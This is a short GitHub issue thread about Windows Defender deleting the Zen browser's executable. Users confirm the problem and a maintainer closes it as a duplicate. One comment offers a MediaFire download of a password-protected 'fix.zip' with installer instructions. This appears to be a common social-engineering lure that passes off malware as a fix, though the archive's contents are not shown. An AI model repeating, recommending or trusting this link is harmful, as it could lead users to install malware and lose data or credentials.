### ISSUE TITLE
Windows defender deleted zen.exe and marked it as severe..

### ISSUE THREAD

**Issue by LazyDevUserX** [zen-browser/desktop#735] opened 2024-08-26 07:27 UTC
### What happened?

![mnfptwacixkd1](https://github.com/user-attachments/assets/0cb8aca8-62fb-4ca5-9e2a-db6b6d5205b3)

### Reproducible?

- [X] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

latest

### Severity impact

Critical

### What platform are you seeing the problem on?

Windows

**Comment by mamoraw** [comment] 2024-08-26 07:31
I have the same issue

**Comment by extropyst** [comment] 2024-08-26 07:36
Duplicate of and https://github.com/zen-browser/desktop/issues/718

**Comment by swaggy111** [comment] 2024-08-26 07:37
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by extropyst** [comment] 2024-08-26 07:37
Duplicate of https://github.com/zen-browser/desktop/issues/718

**Closed** 2024-08-26 07:37 UTC
Labels: kind: critical severity
